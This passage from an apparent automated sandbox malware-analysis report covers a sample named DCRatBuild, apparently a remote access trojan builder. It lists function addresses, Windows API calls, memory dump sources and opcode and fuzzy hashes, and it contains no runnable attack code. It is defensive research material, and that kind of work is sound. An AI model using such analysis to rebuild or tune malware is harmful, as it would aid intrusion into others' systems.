                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 9b39f2559d9a5109bb70a44a200d0a8b2112620fff0357f2832f508ab07c9cda
                                        • Instruction ID: ce2668b9e694fe64515e0a96d96d64aa3778a28d2aa7ff0544f4eafaeac17d18
                                        • Opcode Fuzzy Hash: 9b39f2559d9a5109bb70a44a200d0a8b2112620fff0357f2832f508ab07c9cda
                                        • Instruction Fuzzy Hash: 99719E71604B44AAEB35DB30CC45AEBB7E8AF14301F44496EE5EB87243DA396A48CF50
                                        Function 0073837F Relevance: 1.6, APIs: 1, Instructions: 110COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00738384
                                          • Part of subcall function 00731380: __EH_prolog.LIBCMT ref: 00731385
                                          • Part of subcall function 00731380: new.LIBCMT ref: 007313FE
                                          • Part of subcall function 007319A6: __EH_prolog.LIBCMT ref: 007319AB
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: b8b59758141be276eaae498fab26a6fef4157754a1f32773f8a11306b7f18d72
                                        • Instruction ID: 34d968fa4f0dfc78ca74a81fe90f23b53a90a45b27ec299c4d231e79dd8ed5ab
                                        • Opcode Fuzzy Hash: b8b59758141be276eaae498fab26a6fef4157754a1f32773f8a11306b7f18d72
                                        • Instruction Fuzzy Hash: 2741B131840794DAEF20EB60C859BEA73A8AF50300F4440EAF58AA7493DF7D5BC8DB51
                                        Function 00731E00 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00731E05
                                          • Part of subcall function 00733B3D: __EH_prolog.LIBCMT ref: 00733B42
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 89559c8021283f5dde826b5109388883d84362cac09d74eb6ce21184d7142070
                                        • Instruction ID: f89639bd8caed72a9e6429e658ff5a6d2a73fe01e890d7c243e511bc997c1a0f
                                        • Opcode Fuzzy Hash: 89559c8021283f5dde826b5109388883d84362cac09d74eb6ce21184d7142070
                                        • Instruction Fuzzy Hash: 6C214872944108DFDB11EFA8D9559EEFBF6BF58300F5001ADE846A7252CB3A5E14CB60
                                        Function 0074A7C3 Relevance: 1.6, APIs: 1, Instructions: 71COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 0074A7C8
                                          • Part of subcall function 00731380: __EH_prolog.LIBCMT ref: 00731385
                                          • Part of subcall function 00731380: new.LIBCMT ref: 007313FE
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: f30cc342629c2fd3769edbf93af7a4d281994cbca2bb0320bf9ad174007aa000
                                        • Instruction ID: 9d633af7dd9ff99a864562bd9e2763ee6aac2ded194c026eeaa5fcdceda5998d
                                        • Opcode Fuzzy Hash: f30cc342629c2fd3769edbf93af7a4d281994cbca2bb0320bf9ad174007aa000
                                        • Instruction Fuzzy Hash: CA217F71C04249EEDF15DF94C9529EEB7B8FF19300F4004AEE809A3202DB396E06CB61
                                        Function 007392E6 Relevance: 1.6, APIs: 1, Instructions: 55COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: 71a7e474cf989d4b5b0daad1cbfb04d0b3b8dd07e826177c567d21c03675fe64
                                        • Instruction ID: a62720db6d06c29b79a0b33adaef612971345786efab63d33a553549cf0353db
                                        • Opcode Fuzzy Hash: 71a7e474cf989d4b5b0daad1cbfb04d0b3b8dd07e826177c567d21c03675fe64
                                        • Instruction Fuzzy Hash: 7F118EB3A00528EBDB26ABA8CC859EEB736FF48750F044125F905B7253DB798D1087A0
                                        Function 0073AA88 Relevance: 1.5, APIs: 1, Instructions: 40COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                        • Instruction ID: e48c8228ec42781e95a2401d12b62675011106af6712fcef96d5eb3cdf51794a
                                        • Opcode Fuzzy Hash: dae87922ec1b8facf4cbd1f95d3770f60e2097a5265b52e6532e4d2d30c47c6e
                                        • Instruction Fuzzy Hash: EAF08132504705AFEB30DA64C946616B7D4EB21330F20C91AD4D6C2682E778D880C742
                                        Function 00735BD7 Relevance: 1.5, APIs: 1, Instructions: 32COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog.LIBCMT ref: 00735BDC
                                          • Part of subcall function 0073B07D: __EH_prolog.LIBCMT ref: 0073B082
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: H_prolog
                                        • String ID:
                                        • API String ID: 3519838083-0
                                        • Opcode ID: ccd351684522e56d33f62533d092eb2513f054f6c405e3a335a4c9145694a2d4
                                        • Instruction ID: 2c660c7ed0c04c59a2ec137a114747cd1d91a748a8649cecf617164d4d85793a
                                        • Opcode Fuzzy Hash: ccd351684522e56d33f62533d092eb2513f054f6c405e3a335a4c9145694a2d4
                                        • Instruction Fuzzy Hash: 06018130A15684DAE725F7B4C0593EDF7A4AF19B40F40419DE86A53383CBB81B08C7A2
                                        Function 00758518 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0075C13D,00000000,?,007567E2,?,00000008,?,007589AD,?,?,?), ref: 0075854A
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: 7ab2ca97fb3a79fa2b8dae22b75c9e5cd576473c67f9ca3f316729ff4ae7dd51
                                        • Instruction ID: cb8612245ea9422c2194ab83634dc5a81adb1e60c60ea783919ae20509cad3cd
                                        • Opcode Fuzzy Hash: 7ab2ca97fb3a79fa2b8dae22b75c9e5cd576473c67f9ca3f316729ff4ae7dd51
                                        • Instruction Fuzzy Hash: 1EE0A021A402619BEBA12A695C04BDA37889B413A2F144210BD15B6090EFEC8C2985EB
                                        Function 0073A4C6 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                        Download Yara Rule
                                        APIs
                                        • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0073A4F5
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: CloseFind
                                        • String ID:
                                        • API String ID: 1863332320-0
                                        • Opcode ID: 6045f2ea8b8203576bec48bd0fee7bb6074c716292fe9f782371c0d9b087523b
                                        • Instruction ID: 6539b6202cb07f588a612b3896c2b1686f1d60c8a6dc4c0ea779a57d982fe168
                                        • Opcode Fuzzy Hash: 6045f2ea8b8203576bec48bd0fee7bb6074c716292fe9f782371c0d9b087523b
                                        • Instruction Fuzzy Hash: 98F089354097C0FBDA225B78880ABD6BBA16F16371F04CA49F1FD52193C2BD54959723
                                        Function 0074067C Relevance: 1.5, APIs: 1, Instructions: 21threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SetThreadExecutionState.KERNEL32(00000001), ref: 007406B1
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: ExecutionStateThread
                                        • String ID:
                                        • API String ID: 2211380416-0
                                        • Opcode ID: 82cf5c6b3b8eb7861a000f5987ac3735fe2928ca12f18758a4d8d42747b7fb28
                                        • Instruction ID: 8029253ad7fb5963625c9339624a8a63b61cfe7f8e3aef3035ca0768f214cb78
                                        • Opcode Fuzzy Hash: 82cf5c6b3b8eb7861a000f5987ac3735fe2928ca12f18758a4d8d42747b7fb28
                                        • Instruction Fuzzy Hash: 81D01225744160A5DA213B64A80D7FE1A464FC3B50F0A4065F50E575878B5E08CA96E6
                                        Function 00749D7B Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GdipAlloc.GDIPLUS(00000010), ref: 00749D81
                                          • Part of subcall function 00749B0F: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00749B30
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Gdip$AllocBitmapCreateFromStream
                                        • String ID:
                                        • API String ID: 1915507550-0
                                        • Opcode ID: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                        • Instruction ID: 39d5e38e01a0819f2c8fbbb112da501d049fec5e6e62f6f6d2f1c136049e30c9
                                        • Opcode Fuzzy Hash: 4cf3c4e169e0f80c123d24ade4c43f63bdfd109b4bf71df52acedaf40aa9962d
                                        • Instruction Fuzzy Hash: 8DD0A77075420CFADF40BE708C0697FBBA8EB01310F008025BD0886141EF75DE10E661
                                        Function 00739989 Relevance: 1.5, APIs: 1, Instructions: 15COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetFileType.KERNELBASE(000000FF,00739887), ref: 00739995
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: FileType
                                        • String ID:
                                        • API String ID: 3081899298-0
                                        • Opcode ID: 64389340b99d969b7f8afa7798c394b8a208b1f23822a51b78ab335c5253c7ce
                                        • Instruction ID: 9ca8335315ad71773dae01059842e391fad45cabf79c6cda36ccdf11a1162f0d
                                        • Opcode Fuzzy Hash: 64389340b99d969b7f8afa7798c394b8a208b1f23822a51b78ab335c5253c7ce
                                        • Instruction Fuzzy Hash: D7D01231411241959F6146348D092997752DBC3366F38C6E8D165C40A2D76BD803F541
                                        Function 0074D41A Relevance: 1.5, APIs: 1, Instructions: 13windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 0074D43F
                                          • Part of subcall function 0074AC74: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0074AC85
                                          • Part of subcall function 0074AC74: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0074AC96
                                          • Part of subcall function 0074AC74: IsDialogMessageW.USER32(00050160,?), ref: 0074ACAA
                                          • Part of subcall function 0074AC74: TranslateMessage.USER32(?), ref: 0074ACB8
                                          • Part of subcall function 0074AC74: DispatchMessageW.USER32(?), ref: 0074ACC2
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: Message$DialogDispatchItemPeekSendTranslate
                                        • String ID:
                                        • API String ID: 897784432-0
                                        • Opcode ID: ad602ddd1e3f4878beb5423f639ad9ef6675320bf5814bfab6f86ab837feb530
                                        • Instruction ID: 0aac2db012b505d7f21c342cc0ed322130c99f5bc92abf2646e4ca92af9f3dcd
                                        • Opcode Fuzzy Hash: ad602ddd1e3f4878beb5423f639ad9ef6675320bf5814bfab6f86ab837feb530
                                        • Instruction Fuzzy Hash: 85D09E31184300BBD6112B51CE0AF0F7AA6AB98B04F008654B348740B286669D319B1A
                                        Function 0074D8F2 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 44124e1470477514160a477bf2ade8fae032117799a2687b3b4e02df8b283e11
                                        • Instruction ID: 2e2b03241078d09004974d9c2a1da5ba66a6d1176c103777c6dec6b9e720a25a
                                        • Opcode Fuzzy Hash: 44124e1470477514160a477bf2ade8fae032117799a2687b3b4e02df8b283e11
                                        • Instruction Fuzzy Hash: 1AB012E13AC001BC322C71047D16D36020CC4C3B10330402AB48ED40C2E74C6E4E0831
                                        Function 0074D8FC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 69cb7267b505c7441b503244cc3e3cbf5828f56a1a6955b05a258f265928c71e
                                        • Instruction ID: 2ad512b43755cbbcb9799299773c490abcd9081820e438289ae4ac3f3df7e8ca
                                        • Opcode Fuzzy Hash: 69cb7267b505c7441b503244cc3e3cbf5828f56a1a6955b05a258f265928c71e
                                        • Instruction Fuzzy Hash: 99B012E13AD001BC322C71057C16D36020CC4C3B10330402AB48ED40D2E74C6D490831
                                        Function 0074D8E8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: f17f89e063b04ddca5ce8c5e32fbbc5d5d2ceb38c5c549bfbfed0a9e09317239
                                        • Instruction ID: 622875384a64a983e733f7a007efcdeddcdfebb89a49888df150579b7c756208
                                        • Opcode Fuzzy Hash: f17f89e063b04ddca5ce8c5e32fbbc5d5d2ceb38c5c549bfbfed0a9e09317239
                                        • Instruction Fuzzy Hash: 93B012E13AC101BC326871047C16D36020CC4C3B10331412BB48ED40C2E74C6D890871
                                        Function 0074D8DE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
                                        Memory Dump Source
                                        • Source File: 00000023.00000002.1813897311.0000000000731000.00000020.00000001.01000000.00000008.sdmp, Offset: 00730000, based on PE: true
                                        • Associated: 00000023.00000002.1813835954.0000000000730000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813955205.0000000000763000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.000000000076E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000774000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1813998636.0000000000791000.00000004.00000001.01000000.00000008.sdmpDownload File
                                        • Associated: 00000023.00000002.1814124078.0000000000792000.00000002.00000001.01000000.00000008.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_35_2_730000_DCRatBuild.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID:
                                        • API String ID: 1269201914-0
                                        • Opcode ID: 33be11a7609c1a681fb4308b5a01df0e23a6d3755b56424316b164206a6da3e2
                                        • Instruction ID: 5dfd07b3e67414cf7b0d5db2169693490fd69e25831eaa7ab873a4e6062b0d67
                                        • Opcode Fuzzy Hash: 33be11a7609c1a681fb4308b5a01df0e23a6d3755b56424316b164206a6da3e2
                                        • Instruction Fuzzy Hash: AEB012E13AC001BC322871047C16D36020CC4C3B10330802AB88ED40C2E74C6D490831
                                        Function 0074D8C0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 0074D8A3
                                          • Part of subcall function 0074DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0074DFD6
                                          • Part of subcall function 0074DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0074DFE7
